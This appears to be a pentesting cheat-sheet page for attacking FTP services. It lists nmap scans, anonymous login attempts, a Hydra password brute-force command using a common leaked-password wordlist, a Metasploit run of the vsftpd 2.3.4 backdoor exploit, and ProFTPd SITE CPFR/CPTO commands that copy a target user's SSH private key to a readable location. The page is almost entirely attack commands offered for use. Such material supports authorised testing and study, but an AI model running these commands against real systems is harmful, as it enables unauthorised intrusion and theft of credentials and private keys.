Skip to content

21 - Pentesting FTP

Nmap

nmap -p 21 -A $(target)

Anonymous login

lftp $(target)
ftp $(target)
> anonymous
> anonymous

Bruteforce - Hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://$(target) -I
nmap -p 21 --script=ftp-* $(target)
nmap -p 21 --script=ftp-anon.nse $(target)

Exploit

ProFtpd

searchsploit proftpd 1.3.5

VsFtpd 2.3.4

msf> use exploit/unix/ftp/vsftpd\_234\_backdoor
msf> show options
msf> set RHOST 192.168.0.101
msf> show options
msf> exploit

FTP Copy & Past

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa.pub
SITE CPTO /var/tmp/id_rsa.pub